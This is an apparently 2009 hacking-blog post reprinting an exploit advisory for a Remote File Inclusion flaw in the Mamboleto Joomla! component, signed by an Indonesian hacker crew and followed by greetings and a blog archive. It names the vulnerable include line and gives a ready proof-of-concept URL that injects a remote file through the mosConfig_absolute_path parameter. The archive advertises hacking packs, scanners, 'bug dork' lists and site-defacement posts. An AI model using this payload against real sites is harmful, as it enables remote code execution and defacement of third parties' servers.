/**************************************************************************
[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : December 10, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)
**************************************************************************/
[ Software Information ]
[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em “legacy mode”.
Muito mais aprimorado com dois bancos a mais (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down
===========================================================================
[ Vulnerable File ]
[+] mamboleto.php
Line 123
include_once( $mosConfig_absolute_path . ‘/administrator/components/com_mamboleto/include/pre.php’);
[ Proof of Concept ]
http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]
===========================================================================
[ Who The Hell Has Control of That Damn Smoke Machine ]
[~] INDONESIAN CODER TEAM – KILL-9 CREW – MainHack Brotherhood – ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends
[ rm -rf yourself ]
[>] FOR MALINGSIAL
[ some quotes ]
[+] Jack- says : why so serious ?
[+] Yadoy666 says : awas ada tukang =))
[+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!!
[+] Pathloader says : Oke lah kalau beg… beg… beg… begitu :D
[+] tiw0L says : Ojo di maem pleaseeeeee!!!
[+] kaMtiEz says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p
Pencarian
Blog Archive
-
▼
2009
(52)
-
▼
December
(52)
- 140 Amazing Hacks For your PC
- Ultra Hacker 155 in 1
- Full Hack Pack 2009 [Exclusive]
- Wifi Hacks 2009 AIO
- Wireless Hack Toolz 2009
- Dangerous Hack Tool 2010
- KingCripts Hacking Pack
- ESET Nod32 Keys Finder V7
- A.I.O USB Utilities Tools
- Hacking Tools - 85 in 1
- Metasploit Framework
- Network Spy 2.0
- "UU ITE Bermasalah di Penerapan"
- Tifatul: UU ITE Miliki Beberapa Kejanggalan
- Tutorial LAN Hacking (Newbie)
- Nessus
- Linux sock_sendpage
- Linux kernel 2.4/2.6
- Kernel 2.6.17
- Bug&dork New
- Meffy Scanner
- Albania Scanner
- Defacing malaysuck site
- Defacing malaysian site
- Rose Scanner
- About | MIRC
- Make Proxy From Shell
- Rafly Scanner
- Pittbull Scanner
- SQL Injection Attacks by Example
- Bug Dork PHPBB
- Bug Dork WordPress
- Bajo Sanner
- HACK WIFI
- Joomla Bugs
- Remote File Include (RFI)
- Hacker
- Zell Scanner
- Install Eggdrop
- Alb Scanner
- Italian Scanner
- The Best Hack Tools Collection Ever
- Feelcomz Scanner
- Defacing Indonesian Site
- Mamboleto Joomla! component Remote File Include Vu...
- Old Bug&Dork
- Old Bug-Dork
- Joomla Component com_jphoto SQL injection vulnerab...
- Bug&Dork
- Joomla Component MojoBlog Multiple Remote File Inc...
- Joomla Component com_jsjobs Multiple SQL injection
- Bug-Dork
-
▼
December
(52)
Labels
- Article (17)
- bug dork lfi (5)
- bug dork list (5)
- bug dork rfi (5)
- bug dork sql (5)
- bug dork timthumb (5)
- bug dork xml (5)
- Dork RFI (8)
- Exploit (5)
- Hacking Tools (52)
- Kill-9 News (14)
- lfi bug dork (5)
- Lfi Dork (3)
- LFI Scanner (5)
- Linux-Kernel (17)
- list bug (5)
- list bug dork (5)
- rfi bug dork (5)
- Rfi Scanner (17)
- SQLi (15)
- tutorial (36)
Statistic User
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment